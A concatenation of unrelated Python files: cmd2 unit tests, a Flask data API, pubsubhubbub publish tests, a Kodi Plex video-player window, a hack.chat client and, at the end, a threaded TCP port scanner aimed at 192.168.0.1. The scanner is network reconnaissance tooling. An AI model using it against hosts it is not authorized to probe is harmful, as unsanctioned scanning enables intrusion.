app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_terminal_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_TERMINAL
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
def test_ansi_never_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_NEVER
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
def test_ansi_never_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_style = ansi.STYLE_NEVER
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
class DisableCommandsApp(cmd2.Cmd):
"""Class for disabling commands"""
category_name = "Test Category"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@cmd2.with_category(category_name)
def do_has_helper_funcs(self, arg):
self.poutput("The real has_helper_funcs")
def help_has_helper_funcs(self):
self.poutput('Help for has_helper_funcs')
def complete_has_helper_funcs(self, *args):
return ['result']
@cmd2.with_category(category_name)
def do_has_no_helper_funcs(self, arg):
"""Help for has_no_helper_funcs"""
self.poutput("The real has_no_helper_funcs")
@pytest.fixture
def disable_commands_app():
app = DisableCommandsApp()
return app
def test_disable_and_enable_category(disable_commands_app):
##########################################################################
# Disable the category
##########################################################################
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_category(disable_commands_app.category_name, message_to_print)
# Make sure all the commands and help on those commands displays the message
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'help has_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'has_no_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'help has_no_helper_funcs')
assert err[0].startswith(message_to_print)
# Make sure neither function completes
text = ''
line = 'has_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
text = ''
line = 'has_no_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
# Make sure both commands are invisible
visible_commands = disable_commands_app.get_visible_commands()
assert 'has_helper_funcs' not in visible_commands
assert 'has_no_helper_funcs' not in visible_commands
# Make sure get_help_topics() filters out disabled commands
help_topics = disable_commands_app.get_help_topics()
assert 'has_helper_funcs' not in help_topics
##########################################################################
# Enable the category
##########################################################################
disable_commands_app.enable_category(disable_commands_app.category_name)
# Make sure all the commands and help on those commands are restored
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert out[0] == "The real has_helper_funcs"
out, err = run_cmd(disable_commands_app, 'help has_helper_funcs')
assert out[0] == "Help for has_helper_funcs"
out, err = run_cmd(disable_commands_app, 'has_no_helper_funcs')
assert out[0] == "The real has_no_helper_funcs"
out, err = run_cmd(disable_commands_app, 'help has_no_helper_funcs')
assert out[0] == "Help for has_no_helper_funcs"
# has_helper_funcs should complete now
text = ''
line = 'has_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is not None and disable_commands_app.completion_matches == ['result ']
# has_no_helper_funcs had no completer originally, so there should be no results
text = ''
line = 'has_no_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
# Make sure both commands are visible
visible_commands = disable_commands_app.get_visible_commands()
assert 'has_helper_funcs' in visible_commands
assert 'has_no_helper_funcs' in visible_commands
# Make sure get_help_topics() contains our help function
help_topics = disable_commands_app.get_help_topics()
assert 'has_helper_funcs' in help_topics
def test_enable_enabled_command(disable_commands_app):
# Test enabling a command that is not disabled
saved_len = len(disable_commands_app.disabled_commands)
disable_commands_app.enable_command('has_helper_funcs')
# The number of disabled_commands should not have changed
assert saved_len == len(disable_commands_app.disabled_commands)
def test_disable_fake_command(disable_commands_app):
with pytest.raises(AttributeError):
disable_commands_app.disable_command('fake', 'fake message')
def test_disable_command_twice(disable_commands_app):
saved_len = len(disable_commands_app.disabled_commands)
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
    # The length of disabled_commands should have increased by one
new_len = len(disable_commands_app.disabled_commands)
assert saved_len == new_len - 1
saved_len = new_len
# Disable again and the length should not change
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
new_len = len(disable_commands_app.disabled_commands)
assert saved_len == new_len
def test_disabled_command_not_in_history(disable_commands_app):
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
saved_len = len(disable_commands_app.history)
run_cmd(disable_commands_app, 'has_helper_funcs')
assert saved_len == len(disable_commands_app.history)
def test_disabled_message_command_name(disable_commands_app):
message_to_print = '{} is currently disabled'.format(COMMAND_NAME)
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert err[0].startswith('has_helper_funcs is currently disabled')
def test_startup_script(request):
test_dir = os.path.dirname(request.module.__file__)
startup_script = os.path.join(test_dir, '.cmd2rc')
app = cmd2.Cmd(allow_cli_args=False, startup_script=startup_script)
assert len(app._startup_commands) == 1
assert app._startup_commands[0] == "run_script {}".format(utils.quote_string(startup_script))
app._startup_commands.append('quit')
app.cmdloop()
out, err = run_cmd(app, 'alias list')
assert len(out) > 1
assert 'alias create ls' in out[0]
@pytest.mark.parametrize('startup_script', odd_file_names)
def test_startup_script_with_odd_file_names(startup_script):
"""Test file names with various patterns"""
# Mock os.path.exists to trick cmd2 into adding this script to its startup commands
saved_exists = os.path.exists
os.path.exists = mock.MagicMock(name='exists', return_value=True)
app = cmd2.Cmd(allow_cli_args=False, startup_script=startup_script)
assert len(app._startup_commands) == 1
assert app._startup_commands[0] == "run_script {}".format(utils.quote_string(os.path.abspath(startup_script)))
# Restore os.path.exists
os.path.exists = saved_exists
def test_transcripts_at_init():
transcript_files = ['foo', 'bar']
app = cmd2.Cmd(allow_cli_args=False, transcript_files=transcript_files)
assert app._transcript_files == transcript_files
|
__init__.py
|
from flask import Flask, request, jsonify
from flask_cors import CORS
from migration import Migrate, Aggregate
import subprocess
import os
import threading
app = Flask(__name__)
CORS(app)
HOSTNAME = '127.0.0.1'
PORT = 1338
@app.route('/data', methods=['GET'])
def data():
timespan = request.args.get('timespan')
data = Migrate(timespan)
return jsonify(data)
@app.route('/search', methods=['GET'])
def search():
list_len = request.args.get('list')
timespan = request.args.get('timespan')
data = Aggregate(int(list_len), timespan)
return jsonify(data)
def start_scheduler():
print('[INFO] Starting scheduler')
cwd = os.getcwd()
subprocess.run([f'{cwd}/venv/bin/python3', f'{cwd}/scheduler.py'])
scheduler_thread = threading.Thread(target=start_scheduler)
scheduler_thread.start()
if __name__ == '__main__':
app.run(host=HOSTNAME, port=PORT)
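# Illustrative client sketch (not part of this module): how the endpoints above
# might be queried. The 'timespan' and 'list' values shown are assumptions;
# the accepted formats depend on migration.Migrate and migration.Aggregate.
#
#   import requests
#   base = 'http://127.0.0.1:1338'
#   requests.get(base + '/data', params={'timespan': '24h'}).json()
#   requests.get(base + '/search', params={'list': 10, 'timespan': '24h'}).json()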
|
pubsubhubbub_publish_test.py
|
#!/usr/bin/env python
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for the pubsubhubbub_publish module."""
__author__ = 'bslatkin@gmail.com (Brett Slatkin)'
import BaseHTTPServer
import urllib
import unittest
import threading
import pubsubhubbub_publish
REQUESTS = 0
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(self):
global REQUESTS
print 'Accessed', self.path
REQUESTS += 1
length = int(self.headers.get('content-length', 0))
if not length:
return self.send_error(500)
body = self.rfile.read(length)
if self.path == '/single':
if body != urllib.urlencode(
{'hub.url': 'http://example.com/feed', 'hub.mode': 'publish'}):
self.send_error(500)
self.wfile.write('Bad body. Found:')
self.wfile.write(body)
else:
self.send_response(204)
elif self.path == '/multiple':
if body != urllib.urlencode(
{'hub.url': ['http://example.com/feed',
'http://example.com/feed2',
'http://example.com/feed3'],
'hub.mode': 'publish'}, doseq=True):
self.send_error(500)
self.wfile.write('Bad body. Found:')
self.wfile.write(body)
else:
self.send_response(204)
elif self.path == '/batch':
self.send_response(204)
elif self.path == '/fail':
self.send_error(400)
self.wfile.write('bad argument')
else:
self.send_error(404)
class PublishTest(unittest.TestCase):
def setUp(self):
global REQUESTS
REQUESTS = 0
self.server = BaseHTTPServer.HTTPServer(('', 0), RequestHandler)
t = threading.Thread(target=self.server.serve_forever)
t.setDaemon(True)
t.start()
self.hub = 'http://%s:%d' % (
self.server.server_name, self.server.server_port)
self.feed = 'http://example.com/feed'
self.feed2 = 'http://example.com/feed2'
self.feed3 = 'http://example.com/feed3'
def testSingle(self):
pubsubhubbub_publish.publish(self.hub + '/single', self.feed)
self.assertEquals(1, REQUESTS)
def testMultiple(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
self.feed, self.feed2, self.feed3)
def testList(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
[self.feed, self.feed2, self.feed3])
def testIterable(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
iter([self.feed, self.feed2, self.feed3]))
def testBatchSizeLimit(self):
old = pubsubhubbub_publish.URL_BATCH_SIZE
try:
pubsubhubbub_publish.URL_BATCH_SIZE = 2
pubsubhubbub_publish.publish(self.hub + '/batch',
[self.feed, self.feed2, self.feed3])
finally:
pubsubhubbub_publish.URL_BATCH_SIZE = old
self.assertEquals(2, REQUESTS)
def testBadHubHostname(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
'http://asdf.does.not.resolve', self.feed)
def testBadArgument(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
self.hub + '/fail', self.feed)
def testBadHubUrl(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
'not://a.url.is.this', self.feed)
def testNotFound(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
self.hub + '/unknown', self.feed)
if __name__ == '__main__':
unittest.main()
|
videoplayer.py
|
from __future__ import absolute_import
import time
import threading
from kodi_six import xbmc
from kodi_six import xbmcgui
from . import kodigui
from . import windowutils
from . import opener
from . import busy
from . import search
from . import dropdown
from lib import util
from lib import player
from lib import colors
from lib.util import T
PASSOUT_PROTECTION_DURATION_SECONDS = 7200
PASSOUT_LAST_VIDEO_DURATION_MILLIS = 1200000
class VideoPlayerWindow(kodigui.ControlledWindow, windowutils.UtilMixin):
xmlFile = 'script-plex-video_player.xml'
path = util.ADDON.getAddonInfo('path')
theme = 'Main'
res = '1080i'
width = 1920
height = 1080
NEXT_DIM = (537, 303)
PREV_DIM = (462, 259)
ONDECK_DIM = (329, 185)
RELATED_DIM = (268, 397)
ROLES_DIM = (268, 268)
OPTIONS_GROUP_ID = 200
PREV_BUTTON_ID = 101
NEXT_BUTTON_ID = 102
ONDECK_LIST_ID = 400
RELATED_LIST_ID = 401
ROLES_LIST_ID = 403
HOME_BUTTON_ID = 201
SEARCH_BUTTON_ID = 202
PLAYER_STATUS_BUTTON_ID = 204
def __init__(self, *args, **kwargs):
kodigui.ControlledWindow.__init__(self, *args, **kwargs)
windowutils.UtilMixin.__init__(self)
self.playQueue = kwargs.get('play_queue')
self.video = kwargs.get('video')
self.resume = bool(kwargs.get('resume'))
self.postPlayMode = False
self.prev = None
self.playlist = None
self.handler = None
self.next = None
self.videos = None
self.trailer = None
self.aborted = True
self.timeout = None
self.passoutProtection = 0
self.lastFocusID = None
self.lastNonOptionsFocusID = None
def doClose(self):
util.DEBUG_LOG('VideoPlayerWindow: Closing')
self.timeout = None
kodigui.ControlledWindow.doClose(self)
player.PLAYER.handler.sessionEnded()
def onFirstInit(self):
player.PLAYER.on('session.ended', self.sessionEnded)
player.PLAYER.on('post.play', self.postPlay)
player.PLAYER.on('change.background', self.changeBackground)
self.onDeckListControl = kodigui.ManagedControlList(self, self.ONDECK_LIST_ID, 5)
self.relatedListControl = kodigui.ManagedControlList(self, self.RELATED_LIST_ID, 5)
self.rolesListControl = kodigui.ManagedControlList(self, self.ROLES_LIST_ID, 5)
util.DEBUG_LOG('VideoPlayerWindow: Starting session (ID: {0})'.format(id(self)))
self.resetPassoutProtection()
self.play(resume=self.resume)
def onReInit(self):
self.setBackground()
def onAction(self, action):
try:
if self.postPlayMode:
self.cancelTimer()
self.resetPassoutProtection()
if action in(xbmcgui.ACTION_NAV_BACK, xbmcgui.ACTION_CONTEXT_MENU):
if not xbmc.getCondVisibility('ControlGroup({0}).HasFocus(0)'.format(self.OPTIONS_GROUP_ID)):
if not util.advancedSettings.fastBack or action == xbmcgui.ACTION_CONTEXT_MENU:
self.lastNonOptionsFocusID = self.lastFocusID
self.setFocusId(self.OPTIONS_GROUP_ID)
return
else:
if self.lastNonOptionsFocusID and action == xbmcgui.ACTION_CONTEXT_MENU:
self.setFocusId(self.lastNonOptionsFocusID)
self.lastNonOptionsFocusID = None
return
if action in(xbmcgui.ACTION_NAV_BACK, xbmcgui.ACTION_PREVIOUS_MENU):
self.doClose()
return
if action in (xbmcgui.ACTION_NEXT_ITEM, xbmcgui.ACTION_PLAYER_PLAY):
self.playVideo()
elif action == xbmcgui.ACTION_PREV_ITEM:
self.playVideo(prev=True)
elif action == xbmcgui.ACTION_STOP:
self.doClose()
except:
util.ERROR()
kodigui.ControlledWindow.onAction(self, action)
def onClick(self, controlID):
if not self.postPlayMode:
return
self.cancelTimer()
if controlID == self.HOME_BUTTON_ID:
self.goHome()
elif controlID == self.ONDECK_LIST_ID:
self.openItem(self.onDeckListControl)
elif controlID == self.RELATED_LIST_ID:
self.openItem(self.relatedListControl)
elif controlID == self.ROLES_LIST_ID:
self.roleClicked()
elif controlID == self.PREV_BUTTON_ID:
self.playVideo(prev=True)
elif controlID == self.NEXT_BUTTON_ID:
self.playVideo()
elif controlID == self.PLAYER_STATUS_BUTTON_ID:
self.showAudioPlayer()
elif controlID == self.SEARCH_BUTTON_ID:
self.searchButtonClicked()
def onFocus(self, controlID):
if not self.postPlayMode:
return
self.lastFocusID = controlID
if 399 < controlID < 500:
self.setProperty('hub.focus', str(controlID - 400))
else:
self.setProperty('hub.focus', '')
if xbmc.getCondVisibility('Control.HasFocus(101) | Control.HasFocus(102) | ControlGroup(200).HasFocus(0)'):
self.setProperty('on.extras', '')
elif xbmc.getCondVisibility('ControlGroup(60).HasFocus(0)'):
self.setProperty('on.extras', '1')
def searchButtonClicked(self):
self.processCommand(search.dialog(self, section_id=self.prev.getLibrarySectionId() or None))
def roleClicked(self):
mli = self.rolesListControl.getSelectedItem()
if not mli:
return
sectionRoles = busy.widthDialog(mli.dataSource.sectionRoles, '')
if not sectionRoles:
util.DEBUG_LOG('No sections found for actor')
return
if len(sectionRoles) > 1:
x, y = self.getRoleItemDDPosition()
options = [{'role': r, 'display': r.reasonTitle} for r in sectionRoles]
choice = dropdown.showDropdown(options, (x, y), pos_is_bottom=True, close_direction='bottom')
if not choice:
return
role = choice['role']
else:
role = sectionRoles[0]
self.processCommand(opener.open(role))
def getRoleItemDDPosition(self):
y = 1000
if xbmc.getCondVisibility('Control.IsVisible(500)'):
y += 360
if xbmc.getCondVisibility('Control.IsVisible(501)'):
y += 520
if xbmc.getCondVisibility('!String.IsEmpty(Window.Property(on.extras))'):
y -= 300
if xbmc.getCondVisibility('Integer.IsGreater(Window.Property(hub.focus),0) + Control.IsVisible(500)'):
y -= 500
if xbmc.getCondVisibility('Integer.IsGreater(Window.Property(hub.focus),1) + Control.IsVisible(501)'):
y -= 500
focus = int(xbmc.getInfoLabel('Container(403).Position'))
x = ((focus + 1) * 304) - 100
return x, y
def setBackground(self):
video = self.video if self.video else self.playQueue.current()
self.setProperty('background', video.defaultArt.asTranscodedImageURL(1920, 1080, opacity=60, background=colors.noAlpha.Background))
def changeBackground(self, url, **kwargs):
self.setProperty('background', url)
def sessionEnded(self, session_id=None, **kwargs):
if session_id != id(self):
util.DEBUG_LOG('VideoPlayerWindow: Ignoring session end (ID: {0} - SessionID: {1})'.format(id(self), session_id))
return
util.DEBUG_LOG('VideoPlayerWindow: Session ended - closing (ID: {0})'.format(id(self)))
self.doClose()
def play(self, resume=False, handler=None):
self.hidePostPlay()
self.setBackground()
if self.playQueue:
player.PLAYER.playVideoPlaylist(self.playQueue, resume=self.resume, session_id=id(self), handler=handler)
elif self.video:
player.PLAYER.playVideo(self.video, resume=self.resume, force_update=True, session_id=id(self), handler=handler)
def openItem(self, control=None, item=None):
if not item:
mli = control.getSelectedItem()
if not mli:
return
item = mli.dataSource
self.processCommand(opener.open(item))
def showPostPlay(self):
self.postPlayMode = True
self.setProperty('post.play', '1')
def hidePostPlay(self):
self.postPlayMode = False
self.setProperty('post.play', '')
self.setProperties((
'post.play.background',
'info.title',
'info.duration',
'info.summary',
'info.date',
'next.thumb',
'next.title',
'next.subtitle',
'prev.thumb',
'prev.title',
'prev.subtitle',
'related.header',
'has.next'
), '')
self.onDeckListControl.reset()
self.relatedListControl.reset()
self.rolesListControl.reset()
@busy.dialog()
def postPlay(self, video=None, playlist=None, handler=None, **kwargs):
util.DEBUG_LOG('VideoPlayer: Starting post-play')
self.showPostPlay()
self.prev = video
self.playlist = playlist
self.handler = handler
self.getHubs()
self.setProperty(
'thumb.fallback', 'script.plex/thumb_fallbacks/{0}.png'.format(self.prev.type in ('show', 'season', 'episode') and 'show' or 'movie')
)
util.DEBUG_LOG('PostPlay: Showing video info')
if self.next:
self.next.reload(includeRelated=1, includeRelatedCount=10, includeExtras=1, includeExtrasCount=10)
self.setInfo()
self.fillOnDeck()
hasPrev = self.fillRelated()
self.fillRoles(hasPrev)
self.startTimer()
if self.next:
self.setFocusId(self.NEXT_BUTTON_ID)
else:
self.setFocusId(self.PREV_BUTTON_ID)
def resetPassoutProtection(self):
self.passoutProtection = time.time() + PASSOUT_PROTECTION_DURATION_SECONDS
def startTimer(self):
if not util.getSetting('post_play_auto', True):
util.DEBUG_LOG('Post play auto-play disabled')
return
if not self.next:
return
if time.time() > self.passoutProtection and self.prev.duration.asInt() > PASSOUT_LAST_VIDEO_DURATION_MILLIS:
util.DEBUG_LOG('Post play auto-play skipped: Passout protection')
return
else:
millis = (self.passoutProtection - time.time()) * 1000
util.DEBUG_LOG('Post play auto-play: Passout protection in {0}'.format(util.durationToShortText(millis)))
        util.DEBUG_LOG('Starting post-play timer')
self.timeout = time.time() + 16
threading.Thread(target=self.countdown).start()
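    # Descriptive note: auto-play is skipped once the passout-protection window
    # (PASSOUT_PROTECTION_DURATION_SECONDS after the last user interaction) has
    # elapsed and the previous video ran longer than
    # PASSOUT_LAST_VIDEO_DURATION_MILLIS, on the assumption that the viewer has
    # fallen asleep; onAction() resets the window on any key press in post-play.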
def cancelTimer(self):
if self.timeout is not None:
util.DEBUG_LOG('Canceling post-play timer')
self.timeout = None
self.setProperty('countdown', '')
def countdown(self):
while self.timeout and not util.MONITOR.waitForAbort(0.1):
now = time.time()
if self.timeout and now > self.timeout:
self.timeout = None
self.setProperty('countdown', '')
util.DEBUG_LOG('Post-play timer finished')
# This works. The direct method caused the OSD to be broken, possibly because it was triggered from another thread?
# That was the only real difference I could see between the direct method and the user actually clicking the button.
xbmc.executebuiltin('SendClick(,{0})'.format(self.NEXT_BUTTON_ID))
# Direct method, causes issues with OSD
# self.playVideo()
break
elif self.timeout is not None:
self.setProperty('countdown', str(min(15, int((self.timeout or now) - now))))
def getHubs(self):
try:
self.hubs = self.prev.postPlay()
except:
util.ERROR()
self.next = None
if self.playlist:
if self.prev != self.playlist.current():
self.next = self.playlist.current()
else:
if self.prev.type == 'episode' and 'tv.upnext' in self.hubs:
self.next = self.hubs['tv.upnext'].items[-1]
if self.next:
self.setProperty('has.next', '1')
def setInfo(self):
if self.next:
self.setProperty(
'post.play.background',
self.next.art.asTranscodedImageURL(self.width, self.height, blur=128, opacity=60, background=colors.noAlpha.Background)
)
self.setProperty('info.title', self.next.title)
self.setProperty('info.duration', util.durationToText(self.next.duration.asInt()))
self.setProperty('info.summary', self.next.summary)
if self.prev:
self.setProperty(
'post.play.background',
self.prev.art.asTranscodedImageURL(self.width, self.height, blur=128, opacity=60, background=colors.noAlpha.Background)
)
self.setProperty('prev.info.title', self.prev.title)
self.setProperty('prev.info.duration', util.durationToText(self.prev.duration.asInt()))
self.setProperty('prev.info.summary', self.prev.summary)
if self.prev.type == 'episode':
self.setProperty('related.header', T(32306, 'Related Shows'))
if self.next:
self.setProperty('next.thumb', self.next.thumb.asTranscodedImageURL(*self.NEXT_DIM))
self.setProperty('info.date', util.cleanLeadingZeros(self.next.originallyAvailableAt.asDatetime('%B %d, %Y')))
self.setProperty('next.title', self.next.grandparentTitle)
self.setProperty(
'next.subtitle', u'{0} {1} \u2022 {2} {3}'.format(T(32303, 'Season'), self.next.parentIndex, T(32304, 'Episode'), self.next.index)
)
if self.prev:
self.setProperty('prev.thumb', self.prev.thumb.asTranscodedImageURL(*self.PREV_DIM))
self.setProperty('prev.title', self.prev.grandparentTitle)
self.setProperty(
'prev.subtitle', u'{0} {1} \u2022 {2} {3}'.format(T(32303, 'Season'), self.prev.parentIndex, T(32304, 'Episode'), self.prev.index)
)
self.setProperty('prev.info.date', util.cleanLeadingZeros(self.prev.originallyAvailableAt.asDatetime('%B %d, %Y')))
elif self.prev.type == 'movie':
self.setProperty('related.header', T(32404, 'Related Movies'))
if self.next:
self.setProperty('next.thumb', self.next.defaultArt.asTranscodedImageURL(*self.NEXT_DIM))
self.setProperty('info.date', self.next.year)
self.setProperty('next.title', self.next.title)
self.setProperty('next.subtitle', self.next.year)
if self.prev:
self.setProperty('prev.thumb', self.prev.defaultArt.asTranscodedImageURL(*self.PREV_DIM))
self.setProperty('prev.title', self.prev.title)
self.setProperty('prev.subtitle', self.prev.year)
self.setProperty('prev.info.date', self.prev.year)
def fillOnDeck(self):
items = []
idx = 0
onDeckHub = self.hubs.get('tv.ondeck', self.hubs.get('movie.similar'))
if not onDeckHub:
self.onDeckListControl.reset()
return False
for ondeck in onDeckHub.items:
title = ondeck.grandparentTitle or ondeck.title
if ondeck.type == 'episode':
thumb = ondeck.thumb.asTranscodedImageURL(*self.ONDECK_DIM)
else:
thumb = ondeck.defaultArt.asTranscodedImageURL(*self.ONDECK_DIM)
mli = kodigui.ManagedListItem(title or '', thumbnailImage=thumb, data_source=ondeck)
if mli:
mli.setProperty('index', str(idx))
mli.setProperty('progress', util.getProgressImage(mli.dataSource))
mli.setProperty(
'thumb.fallback', 'script.plex/thumb_fallbacks/{0}.png'.format(ondeck.type in ('show', 'season', 'episode') and 'show' or 'movie')
)
if ondeck.type in 'episode':
mli.setLabel2(u'{0}{1} \u2022 {2}{3}'.format(T(32310, 'S'), ondeck.parentIndex, T(32311, 'E'), ondeck.index))
else:
mli.setLabel2(ondeck.year)
items.append(mli)
idx += 1
if not items:
return False
self.onDeckListControl.reset()
self.onDeckListControl.addItems(items)
return True
def fillRelated(self, has_prev=False):
items = []
idx = 0
video = self.next if self.next else self.prev
if not video.related:
self.relatedListControl.reset()
return False
for rel in video.related()[0].items:
mli = kodigui.ManagedListItem(rel.title or '', thumbnailImage=rel.thumb.asTranscodedImageURL(*self.RELATED_DIM), data_source=rel)
if mli:
mli.setProperty('thumb.fallback', 'script.plex/thumb_fallbacks/{0}.png'.format(rel.type in ('show', 'season', 'episode') and 'show' or 'movie'))
mli.setProperty('index', str(idx))
if self.prev and self.prev.type == 'episode':
if not mli.dataSource.isWatched:
mli.setProperty('unwatched.count', str(mli.dataSource.unViewedLeafCount))
else:
mli.setProperty('unwatched', not mli.dataSource.isWatched and '1' or '')
mli.setProperty('progress', util.getProgressImage(mli.dataSource))
items.append(mli)
idx += 1
if not items:
return False
self.setProperty('divider.{0}'.format(self.RELATED_LIST_ID), has_prev and '1' or '')
self.relatedListControl.reset()
self.relatedListControl.addItems(items)
return True
def fillRoles(self, has_prev=False):
items = []
idx = 0
video = self.next if self.next else self.prev
if not video.roles:
self.rolesListControl.reset()
return False
for role in video.roles():
mli = kodigui.ManagedListItem(role.tag, role.role, thumbnailImage=role.thumb.asTranscodedImageURL(*self.ROLES_DIM), data_source=role)
mli.setProperty('index', str(idx))
items.append(mli)
idx += 1
if not items:
return False
self.setProperty('divider.{0}'.format(self.ROLES_LIST_ID), has_prev and '1' or '')
self.rolesListControl.reset()
self.rolesListControl.addItems(items)
return True
def playVideo(self, prev=False):
self.cancelTimer()
try:
if not self.next and self.playlist:
if prev:
self.playlist.prev()
self.aborted = False
self.playQueue = self.playlist
self.video = None
self.play(handler=self.handler)
else:
video = self.next
if prev:
video = self.prev
if not video:
util.DEBUG_LOG('Trying to play next video with no next video available')
self.video = None
return
self.playQueue = None
self.video = video
self.play(handler=self.handler)
except:
util.ERROR()
def play(video=None, play_queue=None, resume=False):
w = VideoPlayerWindow.open(video=video, play_queue=play_queue, resume=resume)
player.PLAYER.reset()
player.PLAYER.off('session.ended', w.sessionEnded)
player.PLAYER.off('post.play', w.postPlay)
player.PLAYER.off('change.background', w.changeBackground)
command = w.exitCommand
del w
util.garbageCollect()
return command
|
hackchat.py
|
import json
import threading
import time
import websocket
class HackChat:
"""A library to connect to https://hack.chat.
    <on_message> is a <list> of callback functions that receive data from
    https://hack.chat. Add your callback functions to this attribute,
    e.g., on_message += [my_callback]
    Each callback function should take 3 parameters: the <HackChat>
    object, the message that was sent, and the nickname of its sender.
"""
def __init__(self, nick, channel="programming"):
"""Connects to a channel on https://hack.chat.
Keyword arguments:
nick -- <str>; the nickname to use upon joining the channel
channel -- <str>; the channel to connect to on https://hack.chat
"""
self.nick = nick
self.channel = channel
self.online_users = []
self.on_message = []
self.on_join = []
self.on_leave = []
self.ws = websocket.create_connection("wss://hack.chat/chat-ws")
self._send_packet({"cmd": "join", "channel": channel, "nick": nick})
threading.Thread(target = self._ping_thread).start()
def send_message(self, msg):
"""Sends a message on the channel."""
self._send_packet({"cmd": "chat", "text": msg})
def _send_packet(self, packet):
"""Sends <packet> (<dict>) to https://hack.chat."""
encoded = json.dumps(packet)
self.ws.send(encoded)
def run(self):
"""Sends data to the callback functions."""
while True:
result = json.loads(self.ws.recv())
if result["cmd"] == "chat" and not result["nick"] == self.nick:
for handler in list(self.on_message):
handler(self, result["text"], result["nick"])
elif result["cmd"] == "onlineAdd":
self.online_users.append(result["nick"])
for handler in list(self.on_join):
handler(self, result["nick"])
elif result["cmd"] == "onlineRemove":
self.online_users.remove(result["nick"])
for handler in list(self.on_leave):
handler(self, result["nick"])
elif result["cmd"] == "onlineSet":
for nick in result["nicks"]:
self.online_users.append(nick)
def _ping_thread(self):
"""Retains the websocket connection."""
while self.ws.connected:
self._send_packet({"cmd": "ping"})
time.sleep(60)
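# Usage sketch (illustrative, not part of the original library). The nick,
# channel and callback below are hypothetical; the callback signature matches
# the one described in the class docstring.
def _example_on_message(chat, message, sender):
    # Echo every message back to the channel, prefixed with the sender's nick.
    chat.send_message("{}: {}".format(sender, message))
if __name__ == "__main__":
    bot = HackChat("example_bot", channel="botDev")
    bot.on_message += [_example_on_message]
    bot.run()  # blocks, dispatching incoming packets to the registered callbacks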
|
port scanner.py
|
from queue import Queue, Empty
import socket
import threading
target = "192.168.0.1"
queue = Queue()
open_ports = []
def portscan(port):
    """Return True if a TCP connection to the target port succeeds."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(1)  # don't hang on filtered ports
    try:
        sock.connect((target, port))
        return True
    except OSError:
        return False
    finally:
        sock.close()  # always release the file descriptor
def get_ports(mode):
if mode == 1:
for port in range(1, 1024):
queue.put(port)
elif mode == 2:
for port in range(1, 49152):
queue.put(port)
elif mode == 3:
ports = [20, 21, 22, 23, 25, 53, 80, 110, 443]
for port in ports:
queue.put(port)
elif mode == 4:
ports = input("Enter your ports (seperate by blank):")
ports = ports.split()
ports = list(map(int, ports))
for port in ports:
queue.put(port)
def worker():
    # Use get_nowait() so a thread that loses the race for the last item
    # exits cleanly instead of blocking forever on an empty queue.
    while True:
        try:
            port = queue.get_nowait()
        except Empty:
            break
        if portscan(port):
            print("Port {} is open!".format(port))
            open_ports.append(port)
def run_scanner(threads, mode):
get_ports(mode)
thread_list = []
for t in range(threads):
thread = threading.Thread(target=worker)
thread_list.append(thread)
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
